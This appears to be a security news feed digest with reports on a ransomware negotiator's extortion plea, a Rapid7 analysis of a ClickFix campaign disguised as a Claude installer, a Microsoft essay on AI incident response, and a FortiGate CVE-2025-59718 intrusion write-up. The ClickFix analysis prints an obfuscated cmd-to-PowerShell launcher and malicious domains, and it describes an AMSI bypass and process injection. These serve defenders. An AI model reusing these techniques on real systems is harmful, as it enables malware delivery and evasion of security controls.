Normal view

There are new articles available, click to refresh the page.
Today — 12 May 2026Main stream

Is The SOC Obsolete, And We Just Haven’t Admitted It Yet?

12 May 2026 at 07:00

Many AI-first enterprises have already embraced sovereign architectures for general AI initiatives; cybersecurity—and the SOC—should be next.

The post Is The SOC Obsolete, And We Just Haven’t Admitted It Yet? appeared first on SecurityWeek.

Before yesterdayMain stream

Former DigitalMint ransomware negotiator pleads guilty to extortion scheme

21 April 2026 at 17:03

A South Florida man pleaded guilty to conspiring with multiple ransomware affiliates to commit attacks against and extort payments from the same U.S. companies he represented as a ransomware negotiator for DigitalMint in 2023, the Justice Department said Monday.

Angelo John Martino III shared confidential information about victim organizations’ internal negotiating positions and insurance policy limits he gained from his work as a ransomware negotiator to extract the maximum ransom payment for himself and other BlackCat affiliates, according to his plea agreement.

Five of Martino’s victims hired DigitalMint, which assigned the 41-year-old to conduct ransomware negotiations on their clients’ behalf — a rare position he exploited to play both sides. DigitalMint, which is not accused of any knowledge or involvement in the crimes, fired Martino the day after the Justice Department informed the company they were investigating him in April 2025. 

The five U.S.-based victims that hired DigitalMint and unwittingly tapped Martino to allegedly conduct ransomware negotiations with himself and his co-conspirators include a nonprofit and companies in the hospitality, financial services, retail and medical industries. All five of those victims paid a ransom.

Prosecutors previously said Martino helped accomplices extort a combined $75.3 million in ransom payments, including a nearly $26.8 million payment from the unnamed nonprofit, and a nearly $25.7 million payment from the unnamed financial services company. 

Martino also admitted to conspiring with Kevin Tyler Martin, another former ransomware negotiator at DigitalMint, and Ryan Clifford Goldberg, a former manager of incident response at Sygnia, to deploy BlackCat ransomware, also known as ALPHV, against five additional U.S. companies between April and November 2023. 

Goldberg and Martin pleaded guilty in December to participating in a series of ransomware attacks and are scheduled for sentencing April 30.

“Angelo Martino’s clients trusted him to respond to ransomware threats and help thwart and remedy them on behalf of victims,” A. Tysen Duva, assistant attorney general at the Justice Department’s Criminal Division, said in a statement. “Instead, he betrayed them and began launching ransomware attacks himself by assisting cybercriminals and harming victims, his own employer, and the cyber incident response industry itself.”

The case against Martino showcases an extreme, albeit rare, example of the dark underbelly of ransomware negotiation as a practice. The pitfalls of ransomware negotiation are excessive and these backchannel negotiations, which remain largely unscrutinized, can go awry for various reasons. 

Officials shared a series of chats Martino held with co-conspirators and his victims that exemplify the lengths he went to betray DigitalMint’s clients and empower his accomplices with crucial tips for a successful negotiation strategy.

DigitalMint did not respond to a request for comment on Martino’s guilty plea.

Negotiation chats exemplify Martino’s crimes

During an incident response with one of his victims, Martino told a BlackCat affiliate the company’s insurance carrier “was only approving small accounts,” according to his plea agreement. “Keep denying our offers and I will let you know once I find out the max the[y] want to pay,” he added.

“We don’t know how you came up with your demand but we are losing money operationally and all of our loans are going to turnover on us this year at double the interest rates,” Martino said in a negotiation chat visible to DigitalMint and the victim organization in the hospitality industry. “We are able to give you $1 million now, which is a very serious offer.”

Following Martino’s instructions, the BlackCat accomplice responded: “Well, you can keep that for the penalties and lawsuits which are coming your way in case we expose you. Time is ticking — we know how much you can pay. Contact your insurance. We know about them also. Stop wasting time.”

That victim company ultimately paid a ransom worth nearly $16.5 million at the time to receive a decryptor and the BlackCat affiliate’s commitment to not publish stolen data. The two other victims Martino represented via DigitalMint at the time paid $6.1 million and $213,000 ransoms for similar commitments.

“Ransomware victims turned to this defendant for help, and he sold them out from the inside,” Jason A. Reding Quiñones, U.S. attorney for the Southern District of Florida, said in a statement.

Martino received a portion of the ransomware payments for his involvement in the conspiracy.

Authorities have seized $10 million in assets and cryptocurrency wallets controlled by Martino. Law enforcement seized multiple vehicles, a food truck and a 29-foot luxury fishing boat that he obtained using proceeds from his crimes.

Officials also seized two properties owned by Martino in Nokomis, Florida, including a bayfront home with an estimated value of $1.68 million and a second single-family home with an estimated value of $396,000. 

Martino surrendered in March to the U.S. Marshals in Miami and was released on a $500,000 bond.

“The FBI works every day to dismantle the ransomware ecosystem,” Brett Leatherman, assistant director of the FBI’s Cyber Division, said in a statement. “That includes apprehending key facilitators like Angelo Martino, who abused the trust placed in him as a private sector negotiator by collaborating with ransomware criminals.”

ALPHV/BlackCat was a notorious ransomware and extortion group linked to a series of attacks on critical infrastructure providers. The ransomware variant first appeared in late 2021, and was later used in dozens of attacks on organizations in the health care sector.

The group behind the ransomware strain also claimed responsibility for the February 2024 attack on UnitedHealth Group subsidiary Change Healthcare, which paid a $22 million ransom and became the largest health care data breach on record, compromising data on about 190 million people.

Martino pleaded guilty to conspiracy to obstruct, delay or affect commerce or the movement of any article or commodity in commerce by extortion. He faces up to 20 years in federal prison and is scheduled for sentencing July 9.

You can read Martino’s plea agreement below.

The post Former DigitalMint ransomware negotiator pleads guilty to extortion scheme appeared first on CyberScoop.

ClickFix Phishing Campaign Masquerading as a Claude Installer

16 April 2026 at 09:00

Overview

It is no secret that phishing campaigns utilizing various ClickFix techniques have been a commonly used method of social engineering. One of the main reasons for this is simply because they work. You know this and Rapid7 does as well. As a company offering managed detection and response (MDR), our customers expect us to be knowledgeable about and able to detect attacks as common as ClickFix campaigns. 

Recently, Rapid7 observed a small grouping of ClickFix events across customers in the EU and US. At the time of discovery, this campaign had very little traction on sites like VirusTotal or within the online security landscape. This campaign was particularly interesting as it appeared to be masquerading as an installer for Claude, an AI tool that has received a considerable amount of attention. 

Using Rapid7 InsightIDR detection rules, our SOC analysts were able to detect and respond to the threat, preventing further compromise. This campaign demonstrates the strength Rapid7 customers get from our MDR service, while peeling back the curtain to provide a real-world example on how we operate behind the scenes. In this blog, we will detail a brief technical analysis of the observed threat actor activities and discuss how this serves as an example of the service we aim to provide our MDR customers. The analysis highlights both the multi-step delivery of the payload as well as the work Rapid7 performs when investigating threats.  

Observed attacker behavior

On April 9, Rapid7 was alerted to mshta executed on a customer asset using the Windows run utility. The alert was generated by the detection rule Attacker Technique - Remote Payload Execution via Run Utility (shell32.dll). This rule will generate an alert when a suspicious process, such as mshta, is added to the RunMRU registry key. This key is important for the detection of ClickFix campaigns, as it tracks the last 26 commands executed by the Windows run utility. One thing that stuck out about this particular mshta command is that the URL, download-version[.]1-5-8[.]com/claude.msixbundle, appeared to be impersonating an MSIX bundle for the popular AI tool, Claude. 

MSIX files are Windows app packages that one would typically see from the Microsoft store, definitely not something you would see being passed as an argument to mshta. While the host was quickly taken down before Rapid7 was able to obtain the claude.msixbundle payload, a copy was obtainable on VirusTotal. Looking at the payload, it does initially appear to be an MSIX bundle. The file header signature, PK, indicates that the file is a ZIP archive and contains a string reference to the MSIX bundle, MicrosoftBing_1.1.37.0_ARM64.msix:

ClaudeFix_figure1.png

Exploring the payload deeper, however, reveals an HTML Application (HTA) embedded within the ZIP archive:

ClaudeFix_figure2.png

The Visual Basic script within the HTA file contains a series of obfuscated strings that are deobfuscated with the following VBS function:

ClaudeFix_figure3.png

Additionally, one of the functions serves to generate an encoded PowerShell script that will serve as the next step in the chain:

ClaudeFix_figure4.png

After the deobfuscation routine is complete, these strings contain references to the required objects and function calls to craft and execute – via ShellExec – the following command:

c:\Windows\System32\cmd.exe” /v:on /c “set x=pow&&set y=ershell&&call %windir%\SysWOW64\WindowsPowershell\v1.0\!x!!y! -E [ENCODED COMMAND]

ClaudeFix_figure5.png

The encoded PowerShell acts as a staging payload. The script will first generate an MD5 hash value based on the COMPUTERNAME and USERNAME environment variables. It will then take the first 16 characters of the hash value and use it to craft a URL to pull another, much larger, PowerShell script. The script also contains a string deobfuscation routine that is responsible for crafting the following strings to be passed to various .NET functions:

  • Assembly

  • System.Mangement.Automation.AmsiUtils

  • amsiContext

  • NonPublic,Static

  • 0x41414141

ClaudeFix_figure6.png

The script will then call the deobfuscation routine to craft a call to WriteInt32 in the .NET Marshal library to overwrite the amsiContext field in System.Management.Automation.AmsiUtils with the value 0x41414141. Once amsiContext is overwritten, the script will download and execute the next stage:

ClaudeFix_figure7.png

The URL is hosting yet another PowerShell script containing highly obfuscated strings and a large byte array. Upon execution of the script, the strings decode to contain the necessary .NET types and method calls to create and execute a PowerShell ScriptBlock. This ScriptBlock is derived from the byte array, which is first base64 decoded and then run through a deobfuscation routine:

ClaudeFix_figure8.png

This ScriptBlock again contains another series of obfuscated strings and a large byte array containing yet another PowerShell ScriptBlock. Following the execution of the script, the code once again creates and executes a PowerShell ScriptBlock:

ClaudeFix_figure9.png

This ScriptBlock culminates in a process injection routine using the .NET interoperability library. The code contains a byte array with encrypted shellcode that gets passed through a XOR routine. The script then obtains handles to the following Windows API calls:

  • NtAllocateVirtualMemory

  • Copy

  • NtProtectVirtualMemory

  • NtCreateThreadEx

  • NtWaitForSingleObject

  • NtFreeVirtualMemory

  • NtClose

After obtaining the handles, the script crafts delegate functions for the Windows API calls and invokes the delegates to perform the process injection routine:

ClaudeFix_figure10.png

Importance to Rapid7’s MDR customers

Rapid7 MDR customers receive the security knowledge of our threat intelligence, detection engineering, incident response, and security operations center analysts. Input from all of these sources directly feeds into how we create detections and respond to alerts. Following is an explanation of how we use events like these to further provide and enhance our services for customers. 

As previously mentioned, ClickFix activity is not new. Detection engineers in the MDR service know this and build rules to address these techniques, such as the rule that caught the activity discussed in this blog.. Detection rules are created in response to activity observed in incident response, customer requests, activity observed from the SOC, threat intelligence, and observations of the security landscape. Rapid7’s detection engineers work with the SOC to monitor these rules for efficacy. Rules that are primarily used to detect initial compromise, such as the one that alerted on this campaign, are additionally monitored to identify any new campaigns. 

Once the campaign is identified, our detection engineers research it to create additional rules. They can also perform retroactive threat hunts across the Rapid7 customer base using IOCs or any new behavioral detections created from researching the campaign. Results from researching campaigns like this one then go on to feed threat intelligence and help inform our detection strategy. This campaign provides a great example of how Rapid7 works on the backend to detect and prevent threats in customer environments. 

Mitigation guidance

Monitor the following registry key to watch for potential ClickFix attacks such as the one observed in this case:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

While Rapid7 MDR customers were covered by the managed SOC, Rapid7 recommends the following actions for containment:

If the activity is not expected, apply containment and review the user's browsing history for the source of the command. The initial lure is often presented to the user when they attempt to browse the internet for free downloads (media, software, etc.). In some cases the malicious command may have been copied to the user's clipboard when visiting the initial webpage, and can be viewed by inspecting the source code of the site. If the infection is successful, an information stealer is often executed as the final payload, meaning that any credentials stored on the infected system should be reset as part of restoration.

MITRE ATT&CK techniques

System Binary Proxy Execution: Mshta

T1218.005

Obfuscated Files or Information: Encrypted/Encoded File

T1027.013

Obfuscated Files or Information: Command Obfuscation

T1027.010

Command and Scripting Interpreter: PowerShell

T1059.001

Process Injection

T1055

Indicators of compromise (IOCs)

Cloude.Msixbundle:

  • 2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97

Domains observed by Rapid7:

  • Oakenfjrod[.]ru

  • download-version[.]1-5-8[.]com

  • download[.]get-version[.]com

Incident response for AI: Same fire, different fuel

When a traditional security incident hits, responders replay what happened. They trace a known code path, find the defect, and patch it. The same input produces the same bad output, and a fix proves it will not happen again. That mental model has carried incident response for decades.

AI breaks it. A model may produce harmful output today, but the same prompt tomorrow may produce something different. The root cause is not a line of code; it is a probability distribution shaped by training data, context windows, and user inputs that no one predicted. Meanwhile, the system is generating content at machine speed. A gap in a safety classifier does not leak one record. It produces thousands of harmful outputs before a human reviewer sees the first one.

Fortunately, most of the fundamentals that make incident response (IR) effective still hold true. The instincts that seasoned responders have developed over time still apply: prioritizing containment, communicating transparently, and learning from each.

AI introduces new categories of harm, accelerates response timelines, and calls for skills and telemetry that many teams are still developing. This post explores which practices remain effective and which require fresh preparation.

The fundamentals still hold

The core insight of crisis management applies to AI without modification: the technical failure is the mechanism, but trust is the actual system under threat. When an AI system produces harmful output, leaks training data, or behaves in ways users did not expect, the damage extends beyond the technical artifact. Trust has technical, legal, ethical, and social dimensions. Your response must address all of them, which is why incident response for AI is inherently cross-functional.

Several established principles transfer directly.

Explicit ownership at every level. Someone must be in command. The incident commander synthesizes input from domain experts; they do not need to be the deepest technical expert in the room. What matters is that ownership is clear and decision-making authority is understood.

Containment before investigation. Stop ongoing harm first. Investigation runs in parallel, not after containment is complete. For AI systems, this might mean disabling a feature, applying a content filter, or throttling access while you determine scope.

Escalation should be psychologically safe. The cost of escalating unnecessarily is minor. The cost of delayed escalation can be severe. Build a culture where raising a flag early is expected, not penalized.

Communication tone matters as much as content. Stakeholders tolerate problems. They cannot tolerate uncertainty about whether anyone is in control. Demonstrate active problem-solving. Be explicit about what you know, what you suspect, and what you are doing about each.

These principles are tested, and they are effective in guiding action. The challenge with AI is not that these principles no longer apply; it is that AI introduces conditions where applying them requires new information, new tools, and new judgment.

Where AI changes the equation

Non-determinism and speed are the headline shifts, but they are not the only ones.

New harm types complicate classification and triage. Traditional IR taxonomies center on confidentiality, integrity, and availability. AI incidents can involve harms that do not fit those categories cleanly: generating dangerous instructions, producing content that targets specific groups, or enabling misuse through natural language interfaces. By making advanced capabilities easy to use, these interfaces enable untrained users to perform complex actions, increasing the risk of misuse or unintended harm. This is why we need an expanded taxonomy. If your incident classification system lacks categories for these harms, your triage process will default to “other” and lose signal.

Severity resists simple quantification. A model producing inaccurate medical information is a different severity than the same model producing inaccurate trivia answers. Good severity frameworks guide judgment; they cannot replace it. For AI incidents, the context around who is affected and how they are affected carries more weight than traditional security metrics alone can capture.

Root cause is often multi-dimensional. In traditional incidents, you find the bug and fix it. In AI incidents, problematic behavior can emerge from the interaction of training data, fine-tuning choices, user context, and retrieval inputs. Investigation may narrow the contributing factors without isolating one defect. Your process must accommodate that ambiguity rather than stalling until certainty arrives.

Before the crisis is the time to work through these implications. The questions that matter: How and when will you know? Who is on point and what is expected of them? What is the response plan? Who needs to be informed, and when? Every one of these questions that you answer before the incident is time you buy during it.

Closing the gaps in telemetry, tooling, and response

If AI changes the nature of incidents, it also changes what you need to detect and respond to them.

Observability is the first gap. Traditional security telemetry monitors network traffic, authentication events, file system changes, and process execution. AI incidents generate different signals: anomalous output patterns, spikes in user reports, shifts in content classifier confidence scores, unexpected model behavior after an update. Many organizations have not yet instrumented AI systems for these signals and, without clear signal, defenders may first learn about incidents from social media or customer complaints. Neither provides the early warning that effective response requires.

AI systems are built with strong privacy defaults – minimal logging, restricted retention, anonymized inputs – and those same defaults narrow the forensic record when you need to establish what a user saw, what data the model touched, or how an attacker manipulated the system. Privacy-by-design and investigative capability require deliberate reconciliation before an incident, because that decision does not get easier once the clock is running.

AI can also help close these gaps. We use AI in our own response operations to enhance our ability to:

  • Detect anomalous outputs as they occur
  • Enforce content policies at system speed
  • Examine model outputs at volumes no human team can match
  • Distill incident discussions so responders spend time deciding rather than reading
  • Coordinate across response workstreams faster than email chains allow

Staged remediation reflects the reality of AI fixes. Incidents require both swift action and thorough review. A model behavior change or guardrail update may not be immediately verifiable in the way a traditional patch is. We use a three-stage approach:

  • Stop the bleed. Tactical mitigations: block known-bad inputs, apply filters, restrict access. The goal is reducing active harm within the first hour.
  • Fan out and strengthen. Broader pattern analysis and expanded mitigations over the next 24 hours, covering thousands of related items. Automation is essential here; manual review cannot keep pace.
  • Fix at the source. Classifier updates, model adjustments, and systemic changes based on what investigation revealed. This stage takes longer, and that is acceptable. The first two stages bought time.

One practical tip: tactical allow-and-block lists are a necessary triage tool, but they are a losing proposition as a permanent solution. Adversaries adapt. Classifiers and systemic fixes are the durable answer.

Watch periods after remediation matter more for AI than for traditional patches. Because model behavior is non-deterministic, verification relies on sustained testing and monitoring across varied conditions rather than a single test pass. Sustained monitoring after each stage confirms that the remediation holds under varied conditions.

The human dimension

There is a dimension of AI incident response that traditional IR addresses unevenly and that AI makes urgent: the wellbeing of the people doing the work.

Defenders handling AI abuse reports and safety incidents are routinely exposed to harmful content. This is not the same cognitive load as analyzing malware samples or reviewing firewall logs. Exposure to graphic, violent, or exploitative material has measurable psychological effects, and extended incidents compound that exposure over days or weeks.

Human exhaustion threatens correctness, continuity, and judgment in any prolonged incident. AI safety incidents place an additional emotional burden on responders due to exposure to distressing content. Recognizing and addressing this challenge is essential, as it directly impacts the well-being of the team and the quality of the response.

What helps:

  • Talk to your team about well-being before the crisis, not during it.
  • Manager-sponsored interventions during extended response work, including scheduled breaks, structured handoffs, and deliberate activities that provide cognitive relief.
  • Some teams use structured cognitive breaks, including visual-spatial activities, to reduce the impact of prolonged exposure to harmful content.
  • Coaching and peer mentoring programs normalize the impact rather than framing it as individual weakness.
  • Leveraging proven practices from safety content moderation teams, whose operational workflows for content review and escalation map directly to AI security moderation is a natural collaboration opportunity.

If your incident response plan does not account for the humans executing it, the plan is incomplete.

Looking ahead

Incident response for AI is not a solved problem. The threat surface is evolving as models gain new capabilities, as agentic architectures introduce autonomous action, and as adversaries learn to exploit natural language at scale. The teams that will handle this well are the ones building adaptive capacity now. Extend playbooks. Instrument AI systems for the right signals. Rehearse novel scenarios. Invest in the people who will be on the front line when something breaks. Good response processes limit damage. Great ones make you stronger for the next incident.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Incident response for AI: Same fire, different fuel appeared first on Microsoft Security Blog.

FortiGate CVE-2025-59718 Exploitation: Incident Response Findings

8 April 2026 at 09:39

Rapid7’s Incident Response (IR) team was engaged to investigate an incident involving exploitation of CVE-2025-59718 against a vulnerable FortiGate appliance. In December 2025, Fortinet disclosed this improper verification of cryptographic signature vulnerability that facilitates an SSO login bypass on affected appliances. After the initial exploitation, the attackers maintained a low-profile posture, systematically compromising additional firewalls before moving to internal network hosts. Ultimately, this grace period allowed responders to contain the threat before further impact could occur within the environment. This blog details exploitation insights, attack progression, and practical detection opportunities for defenders handling their own environments.

Investigative methodology: Tracing the initial access vector in FortiGate appliances

Identifying the Initial Access Vector (IAV) is a cornerstone of any incident response engagement. However, when the source of compromise is not immediately obvious, particularly when edge device exploitation is involved, responders often need to take a broader investigative approach. Rather than starting with a clear point of entry, investigators must analyze the available telemetry, reconstruct attacker activity, and work backwards to determine how access was first obtained.

This process often involves multiple investigative workstreams running in parallel, each designed to answer different questions about the intrusion. As many IR responders and enthusiasts know, the first suspicious event observed during an investigation is rarely the first action taken by the attacker. Instead, it typically represents a point somewhere in the middle of a larger attack chain.

A key step in incident response investigations is reconstructing the attacker timeline. Responders often take an “inside out” approach where they move outward from the initial alert to the full scope of the malicious activity (IAV), correlating multiple data sources to map the unfolding of the event. This process involves examining authentication logs, endpoint telemetry, firewall events, and records of system changes, rather than depending on just one log source. It also typically requires frequent pivoting between artifacts as investigations rarely ever unfold in a linear fashion. By aligning these findings and events chronologically, investigators often identify activity that predates the initial alert.

CVE-2025-59718: Technical analysis and observed attacker behavior

The first activity that drew attention was enumeration and credential discovery within the internal environment. This basic enumeration included gathering information about users, systems, and accessible resources within common user directories. This activity eventually expanded to SMB-based file scraping and network share access, allowing attackers to review files stored across the environment. While this behavior resembled routine administration, the chronological sequence of file scraping and network share access painted a clear picture of an attacker’s initial discovery phase.

Digging deeper into the credential discovery activity, the popular tool Mimikatz was utilized to harvest credentials from various sources within the impacted environment. The attacker’s objective was to obtain valid credentials to an elevated admin account with the goal to blend in.

With credentials in hand and mimicking admin activity to disguise their actions, the attacker was then enabled to move laterally throughout the environment using common administrative tools and access methods. PsExec and Microsoft Remote Desktop (RDP) were two tools utilized for lateral movement while standard web browsers facilitated application access.

Attackers appeared particularly interested in systems that could provide broader access to the environment, including virtualization platforms, domain controllers, and servers supporting backup infrastructure. These systems often represent high-value targets for attackers seeking to escalate privileges, access sensitive data, or disrupt recovery capabilities.

Responders were working simultaneously to contain the attacker while building the narrative to cut them off at the source. With the current understanding of the narrative, the IAV puzzle began to unravel as more information came to light. Strangely, the first authentication into the Windows environment originated from an internal IP address that did not align with the known internal IP address ranges. It turns out, this internal IP address fell within the DHCP lease range of the FortiGate device. At first glance, this could be written off as legitimate VPN activity. However, to create even more questions, it was revealed that the FortiGate SSL VPN was never turned on within this environment. This revelation made the FortiGate device a prime suspect for IAV.

Taking a closer look at the FortiGate device, specifically system logs and configuration data, revealed early indications that the device had been modified to support continued access. The SSL VPN component had been enabled, and multiple configuration changes were identified, including edits to VPN settings, the creation of new firewall policies, and adjustments to configuration parameters. These changes appeared in FortiGate system logs as configuration updates similar to the following:

logid="0100044546" type="event" subtype="system" level="information"
vd="root" logdesc="Attribute configured" user="admins"
ui="GUI(45.32.216[.]250)" action="Edit" cfgpath="vpn.ssl.settings"
msg="Edit vpn.ssl.settings"

logid="0100044547" type="event" subtype="system" level="information" 
vd="root" logdesc="Object attribute configured" user="admins" 
ui="GUI(45.32.216[.]250)" action="Add" cfgpath="firewall.policy" 
cfgobj="XX" msg="Add firewall.policy <redacted>"

While these types of changes may seem routine in isolation, it is the combination and timing of these actions that raises concerns from a responder's perspective. The investigation's next key clue was identified when the source of these changes was traced back to a newly created account.

Following this thread further, investigators identified that multiple accounts had been created on the device, including SSO administrator, system administrator, and local accounts. Several of these accounts were associated with email domains attributed to Namecheap-hosted infrastructure, including domains such as openmail[.]pro. Notably, some of the newly created SSO administrator accounts were linked to forticloud.com domains as reflected in log entries such as:

Object attribute configured(Add system.sso-forticloud-admin <attacker account>@forticloud.com-1)

For responders, the creation of multiple new administrative accounts is often a strong indicator of persistence being established. Continuing to work backwards through the timeline, investigators identified that prior to these account creation events, the device’s configuration file was downloaded through the FortiGate UI. From an investigative perspective, configuration exports are highly valuable to attackers because they effectively serve as a blueprint of the environment, exposing network architecture, authentication mechanisms/settings, device relationships, and occasionally, sensitive credentials.

logid="0100032095" type="event" subtype="system" level="warning" 
vd="root" logdesc="Admin performed an action from GUI" user="admin" 
ui="GUI(104.28.227[.]105)" action="download" status="success" 
msg="System config file has been downloaded by user admin via GUI(104.28.227[.]105)"

The session associated with the configuration download was established from an external IP address flagged as “malicious” by security vendors with a local account already present on the device. All of these new findings from the attacker’s actions can now be utilized as IOCs to scope available FortiGate logs to determine any other leads.

By correlating activity with the known malicious IP addresses, investigators identified the true entry point: administrative SSO logins to the FortiGate appliance with valid accounts. Another important detail was that there was no evidence of brute-forcing activity for these local accounts. The initial access was established approximately two weeks before any subsequent malicious activity, indicating the attacker used this time to secure consistent access to the environment via the FortiGate device.

Actions such as changing configurations, creating accounts, and downloading configurations might seem harmless individually. However, when viewed together, these activities established a clear pattern consistent with the exploitation of CVE-2025-59718 that facilitated authentication bypass.

Once this groundwork was established through persistence mechanisms and discovery, attackers began authenticating into the environment with their newly created accounts via the SSL VPN connections that led us to investigate the FortiGate device in the first place. These sessions effectively transformed the firewall into an ingress point into the internal network, allowing attackers to move beyond the edge device.

This investigation highlights a common reality in incident response where the first indicator of suspicious activity is rarely the beginning of the story. Instead, responders are often working from a point somewhere in the middle, tasked with reconstructing attacker behavior and peeling back layers of activity to uncover how access was first obtained. 

By following the digital breadcrumbs left behind within available evidence sources, investigators were able to trace the intrusion back to its origin. This process emphasizes the importance of working backward through artifacts and telemetry, recognizing that each piece of data may lead to an earlier stage of attacker activity.

Network edge devices such as firewalls and VPN appliances are often the main vectors of initial access. Despite being critical infrastructure in modern environments, full visibility is rarely achieved in comparison to monitored endpoints. These edge devices can provide valuable evidence during investigations and reveal how initial access went unnoticed.

Conclusion: Key takeaways for defenders

The human element of investigation is crucial. Effective investigations demand a mindset of curiosity; on one side the willingness to dig deeper, and on the other, the ability to look at the big picture. At face value these can seem contradictory, but each facilitates a specific role within an incident response investigation.

Curiosity is what drives responders to grapple with the initial evidence, question assumptions, and identify which threads are worth pulling. It allows responders to move beyond surface-level observations and begin forming hypotheses about what may have occurred. The willingness to dive deeper is what turns those hypotheses into answers. Rather than stopping at the first suspicious event, responders must continue pivoting across logs, correlating activity, and tracing actions further back in time. At the same time, maintaining a big-picture perspective is critical. Individual artifacts or events may appear benign in isolation but when viewed chronologically the attacker behavior emerges.

Looking past any specific incident response methodology, visibility into the environment is essential. Even the strongest investigative approach is limited without access to the right telemetry, thus preventing responders from fully reconstructing an intrusion. In particular, as seen within this investigation, visibility into edge device activity can play a crucial role in unraveling IAV. The network edge is a hostile environment yet is frequently less monitored.

As is often the case with externally facing services and devices, the network edge is constantly targeted. Due to the sheer volume of persistent targeting, this environment can prove difficult to monitor for successful malicious intrusions. Implementing centralized syslog monitoring across these edge devices can close these visibility gaps. It can provide a real-time audit trail of connection attempts, configuration changes, and potential exploit signatures that occur before a threat reaches the internal network.

By effectively pulling on each investigative thread and ensuring visibility across both internal systems and edge devices, defenders can uncover compromises that might otherwise remain hidden. Often, the path to the beginning of the intrusion is already present; it simply requires knowing where, and how, to look.

Detection coverage for Rapid7 customers

Rapid7 actively monitors for emerging threats and leverages evidence from incident response engagements to develop new detection capabilities. Detections have been created and implemented by Rapid7 to pinpoint both exploitation attempts and post-exploitation activities related to FortiGate CVE-2025-59718. For InsightIDR and MDR customers, these detections alert on attacker activity consistent with the techniques described in this blog, enabling earlier identification and response before an intrusion can escalate further.

Detections:

  • Potential Exploitation - FortiGate Admin SSO Login and Config Download via External IP

  • Exfiltration - FortiGate Config Downloaded Using GUI via External IP

  • Suspicious Authentication - FortiGate SSO Login via External IP

Mitigation guidance

Please refer to our initial blog from December, 2025.

MITRE ATT&CK Techniques

Tactic

Technique

Details

Initial Access

Exploit Public-Facing Application (T1190)

Exploitation of vulnerability CVE-2025-59718 on FortiGate firewalls.

Persistence

Create Account (T1136)

Creation of local accounts on FortiGate firewalls.

Persistence and Initial Access

Valid Accounts (T1078)

Use of created accounts and compromised accounts for SSL VPN and RDP authentication.

Defense Evasion

Impair Defenses (T1562)

Firewall rules added to allow for attacker access.

Credential Access

OS Credential Dumping (T1003)

Execution of Mimikatz targeting the local system and Windows Registry hives containing credentials.

Discovery

System Network Configuration Discovery (T1016)

Download of FortiGate firewall configuration files containing sensitive networking information.

Discovery

Network Service Scanning (T1046)

Execution of network scanning tools such as Advanced_Port_Scanner to scan internal IP addresses over SMB protocol.

Lateral Movement

Remote Services (T1021)

Use of Remote Desktop Protocol (RDP).

Execution

Service Execution (T1569.002)

Remote execution of the sysinternals tool PsExec to test credentials against an impacted system.

Indicators of compromise (IOCs)

IOC

Description

Advanced_IP_Scanner_2.5.4594.1.exe

Advanced IP Scanner tool utilized by the attacker.

advanced_ip_scanner.exe 

Advanced IP Scanner tool utilized by the attacker.

mimikatz.exe

An open-source post-exploitation tool utilized by the attacker to extract sensitive authentication credentials.

Advanced_port_scanner_2.5.3869.exe

An open-source network utility utilized by the attacker to quickly map active devices and identify open ports.

23.163.8[.]21

Attacker IP address that targeted FortiGate device.

45.32.216[.]250

IP address used by the attacker during FortiGate configuration changes.

45.84.107[.]17

IP address identified in malicious interaction with SSLVPN.

45.80.186[.]84

IP address identified in malicious interaction with SSLVPN.

185.219.157[.]127

IP address identified in malicious interaction with SSLVPN.

185.175.59[.]238

IP address identified in malicious interaction with SSLVPN.

198.98.54[.]209

Attacker IP address that targeted FortiGate device and SSO login.

45.80.184[.]229

Attacker IP address that targeted FortiGate device and SSLVPN.

45.80.184[.]241

Attacker IP address that targeted FortiGate device and SSLVPN.

42.200.230[.]178

Attacker IP address that targeted FortiGate device and SSLVPN.

103.20.235[.]155

IP address identified in malicious authentications to SSO login.

104.28.227[.]105

IP address identified in attacker download of FortiGate configuration file.

Feds say another DigitalMint negotiator ran ransomware attacks and helped extort $75 million

12 March 2026 at 09:30

A 41-year-old South Florida man is accused of conducting at least 10 ransomware attacks and helping accomplices extort a combined $75.25 million in ransom payments while he was working as a ransomware negotiator for DigitalMint. 

Five of Angelo John Martino III’s alleged victims hired DigitalMint, which assigned Martino to conduct ransomware negotiations on their clients’ behalf — putting him in a position to play both sides, as the criminal responsible for the attack and the lead negotiator for his alleged victims, according to federal court records unsealed Wednesday.

Martino allegedly obtained an affiliate account on ALPHV, also known as BlackCat, and conspired with other former cybersecurity professionals to break into victims’ networks, steal and encrypt data, and extort companies for ransoms over a six-month period in 2023.

Martino was an unnamed co-conspirator in an indictment filed in November 2025 against Kevin Tyler Martin, another former ransomware negotiator at DigitalMint, and Ryan Clifford Goldberg, a former manager of incident response at Sygnia. Goldberg and Martin pleaded guilty in December to participating in a series of ransomware attacks and are scheduled for sentencing April 30.

Prosecutors accuse Martino of providing confidential information regarding ransomware negotiations to ALPHV co-conspirators to maximize the ransom payment. His attorney did not immediately respond to a request for comment.

The five U.S.-based victims that hired DigitalMint and unwittingly tapped Martino to allegedly conduct ransomware negotiations with himself and his co-conspirators include a nonprofit and companies in the hospitality, financial services, retail and medical industries. All five of those victims paid a ransom.

Goldberg and Martin were not specifically named as co-conspirators in those attacks. Prosecutors previously said they only successfully extorted a financial payment from one of their victims for nearly $1.3 million.

Cybersecurity firm that employed Martino responds

DigitalMint said they suspended Martino’s access to systems when the Justice Department notified the company they were investigating him on April 3 and fired him the next day. The company, which is not accused of any knowledge or involvement with the crimes, added it was not aware that Martino and Martin were already involved in ransomware-related schemes before they were hired. 

“We strongly condemn these former employees’ criminal behavior, which violated our values, ethical standards and the law,” DigitalMint CEO Jonathan Solomon said in a statement to CyberScoop.

“DigitalMint has fully cooperated with law enforcement from the outset and does not expect further charges,” Solomon added. “While no organization can completely eliminate insider risk, we take incidents like this extremely seriously and have strengthened safeguards and internal controls to further reduce the likelihood of similar conduct.”

DigitalMint did not directly answer questions about whether it refunded its clients who were allegedly victimized by Martino. “We are not able to discuss specific client relationships or fee arrangements due to confidentiality obligations,” a spokesperson said in a statement. “We remain committed to our clients and have addressed any commercial matters directly with those parties.”

The company also declined to describe the circumstances under which it was hired and assigned Martino to conduct ransomware negotiations on the attacks he allegedly committed. Yet, in a statement it noted: “The charging documents do not allege that Martino referred or brought these victims to DigitalMint.”

